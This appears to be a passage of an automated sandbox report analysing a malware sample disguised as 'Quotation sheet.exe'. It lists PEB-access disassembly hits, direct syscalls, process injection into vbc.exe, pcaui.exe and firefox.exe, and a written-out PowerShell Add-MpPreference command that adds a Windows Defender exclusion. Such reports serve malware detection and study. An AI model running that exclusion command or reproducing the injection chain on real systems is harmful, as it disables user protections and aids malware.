                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535EDD3 mov eax, dword ptr fs:[00000030h]7_2_0535EDD3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B4DD7 mov eax, dword ptr fs:[00000030h]7_2_053B4DD7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B4DD7 mov eax, dword ptr fs:[00000030h]7_2_053B4DD7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05404DAD mov eax, dword ptr fs:[00000030h]7_2_05404DAD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D4C34 mov eax, dword ptr fs:[00000030h]7_2_053D4C34
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D4C34 mov eax, dword ptr fs:[00000030h]7_2_053D4C34
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D4C34 mov eax, dword ptr fs:[00000030h]7_2_053D4C34
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D4C34 mov eax, dword ptr fs:[00000030h]7_2_053D4C34
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D4C34 mov eax, dword ptr fs:[00000030h]7_2_053D4C34
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D4C34 mov eax, dword ptr fs:[00000030h]7_2_053D4C34
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D4C34 mov ecx, dword ptr fs:[00000030h]7_2_053D4C34
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532EC20 mov eax, dword ptr fs:[00000030h]7_2_0532EC20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053CCC20 mov eax, dword ptr fs:[00000030h]7_2_053CCC20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053CCC20 mov eax, dword ptr fs:[00000030h]7_2_053CCC20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340C00 mov eax, dword ptr fs:[00000030h]7_2_05340C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340C00 mov eax, dword ptr fs:[00000030h]7_2_05340C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340C00 mov eax, dword ptr fs:[00000030h]7_2_05340C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340C00 mov eax, dword ptr fs:[00000030h]7_2_05340C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B4C0F mov eax, dword ptr fs:[00000030h]7_2_053B4C0F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536CC00 mov eax, dword ptr fs:[00000030h]7_2_0536CC00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533AC50 mov eax, dword ptr fs:[00000030h]7_2_0533AC50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533AC50 mov eax, dword ptr fs:[00000030h]7_2_0533AC50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533AC50 mov eax, dword ptr fs:[00000030h]7_2_0533AC50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533AC50 mov eax, dword ptr fs:[00000030h]7_2_0533AC50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533AC50 mov eax, dword ptr fs:[00000030h]7_2_0533AC50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533AC50 mov eax, dword ptr fs:[00000030h]7_2_0533AC50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05336C50 mov eax, dword ptr fs:[00000030h]7_2_05336C50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05336C50 mov eax, dword ptr fs:[00000030h]7_2_05336C50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05336C50 mov eax, dword ptr fs:[00000030h]7_2_05336C50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05364C59 mov eax, dword ptr fs:[00000030h]7_2_05364C59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05358CB1 mov eax, dword ptr fs:[00000030h]7_2_05358CB1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05358CB1 mov eax, dword ptr fs:[00000030h]7_2_05358CB1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0CB5 mov eax, dword ptr fs:[00000030h]7_2_053E0CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0CB5 mov eax, dword ptr fs:[00000030h]7_2_053E0CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0CB5 mov eax, dword ptr fs:[00000030h]7_2_053E0CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0CB5 mov eax, dword ptr fs:[00000030h]7_2_053E0CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0CB5 mov eax, dword ptr fs:[00000030h]7_2_053E0CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0CB5 mov eax, dword ptr fs:[00000030h]7_2_053E0CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0CB5 mov eax, dword ptr fs:[00000030h]7_2_053E0CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0CB5 mov eax, dword ptr fs:[00000030h]7_2_053E0CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0CB5 mov eax, dword ptr fs:[00000030h]7_2_053E0CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0CB5 mov eax, dword ptr fs:[00000030h]7_2_053E0CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0CB5 mov eax, dword ptr fs:[00000030h]7_2_053E0CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0CB5 mov eax, dword ptr fs:[00000030h]7_2_053E0CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0CB5 mov eax, dword ptr fs:[00000030h]7_2_053E0CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053ACCA0 mov ecx, dword ptr fs:[00000030h]7_2_053ACCA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053ACCA0 mov eax, dword ptr fs:[00000030h]7_2_053ACCA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053ACCA0 mov eax, dword ptr fs:[00000030h]7_2_053ACCA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053ACCA0 mov eax, dword ptr fs:[00000030h]7_2_053ACCA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05328C8D mov eax, dword ptr fs:[00000030h]7_2_05328C8D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05362CF0 mov eax, dword ptr fs:[00000030h]7_2_05362CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05362CF0 mov eax, dword ptr fs:[00000030h]7_2_05362CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05362CF0 mov eax, dword ptr fs:[00000030h]7_2_05362CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05362CF0 mov eax, dword ptr fs:[00000030h]7_2_05362CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05328CD0 mov eax, dword ptr fs:[00000030h]7_2_05328CD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532CCC8 mov eax, dword ptr fs:[00000030h]7_2_0532CCC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535EF28 mov eax, dword ptr fs:[00000030h]7_2_0535EF28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05332F12 mov eax, dword ptr fs:[00000030h]7_2_05332F12
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05404F68 mov eax, dword ptr fs:[00000030h]7_2_05404F68
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536CF1F mov eax, dword ptr fs:[00000030h]7_2_0536CF1F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E6F00 mov eax, dword ptr fs:[00000030h]7_2_053E6F00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535AF69 mov eax, dword ptr fs:[00000030h]7_2_0535AF69
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535AF69 mov eax, dword ptr fs:[00000030h]7_2_0535AF69
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D2F60 mov eax, dword ptr fs:[00000030h]7_2_053D2F60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D2F60 mov eax, dword ptr fs:[00000030h]7_2_053D2F60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532CF50 mov eax, dword ptr fs:[00000030h]7_2_0532CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532CF50 mov eax, dword ptr fs:[00000030h]7_2_0532CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532CF50 mov eax, dword ptr fs:[00000030h]7_2_0532CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532CF50 mov eax, dword ptr fs:[00000030h]7_2_0532CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532CF50 mov eax, dword ptr fs:[00000030h]7_2_0532CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532CF50 mov eax, dword ptr fs:[00000030h]7_2_0532CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536CF50 mov eax, dword ptr fs:[00000030h]7_2_0536CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D0F50 mov eax, dword ptr fs:[00000030h]7_2_053D0F50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B4F40 mov eax, dword ptr fs:[00000030h]7_2_053B4F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B4F40 mov eax, dword ptr fs:[00000030h]7_2_053B4F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B4F40 mov eax, dword ptr fs:[00000030h]7_2_053B4F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B4F40 mov eax, dword ptr fs:[00000030h]7_2_053B4F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D4F42 mov eax, dword ptr fs:[00000030h]7_2_053D4F42
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05404FE7 mov eax, dword ptr fs:[00000030h]7_2_05404FE7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05362F98 mov eax, dword ptr fs:[00000030h]7_2_05362F98
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05362F98 mov eax, dword ptr fs:[00000030h]7_2_05362F98
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536CF80 mov eax, dword ptr fs:[00000030h]7_2_0536CF80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05370FF6 mov eax, dword ptr fs:[00000030h]7_2_05370FF6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05370FF6 mov eax, dword ptr fs:[00000030h]7_2_05370FF6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05370FF6 mov eax, dword ptr fs:[00000030h]7_2_05370FF6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05370FF6 mov eax, dword ptr fs:[00000030h]7_2_05370FF6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E6FF7 mov eax, dword ptr fs:[00000030h]7_2_053E6FF7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534CFE0 mov eax, dword ptr fs:[00000030h]7_2_0534CFE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534CFE0 mov eax, dword ptr fs:[00000030h]7_2_0534CFE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532EFD8 mov eax, dword ptr fs:[00000030h]7_2_0532EFD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532EFD8 mov eax, dword ptr fs:[00000030h]7_2_0532EFD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532EFD8 mov eax, dword ptr fs:[00000030h]7_2_0532EFD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05332FC8 mov eax, dword ptr fs:[00000030h]7_2_05332FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05332FC8 mov eax, dword ptr fs:[00000030h]7_2_05332FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05332FC8 mov eax, dword ptr fs:[00000030h]7_2_05332FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05332FC8 mov eax, dword ptr fs:[00000030h]7_2_05332FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05402E4F mov eax, dword ptr fs:[00000030h]7_2_05402E4F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05402E4F mov eax, dword ptr fs:[00000030h]7_2_05402E4F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C6E20 mov eax, dword ptr fs:[00000030h]7_2_053C6E20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C6E20 mov eax, dword ptr fs:[00000030h]7_2_053C6E20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C6E20 mov ecx, dword ptr fs:[00000030h]7_2_053C6E20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05328E1D mov eax, dword ptr fs:[00000030h]7_2_05328E1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535AE00 mov eax, dword ptr fs:[00000030h]7_2_0535AE00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535AE00 mov eax, dword ptr fs:[00000030h]7_2_0535AE00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535AE00 mov eax, dword ptr fs:[00000030h]7_2_0535AE00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535AE00 mov ecx, dword ptr fs:[00000030h]7_2_0535AE00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535AE00 mov eax, dword ptr fs:[00000030h]7_2_0535AE00
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe"
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe"Jump to behavior
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\Quotation sheet.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtClose: Direct from: 0x77382B6C
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\Quotation sheet.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: NULL target: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: NULL target: C:\Windows\SysWOW64\pcaui.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: NULL target: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: NULL target: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\pcaui.exeThread register set: target process: 5876Jump to behavior
                      Queues an APC in another process (thread injection)
                      Source: C:\Windows\SysWOW64\pcaui.exeThread APC queued: target process: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\Quotation sheet.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000Jump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 738008Jump to behavior
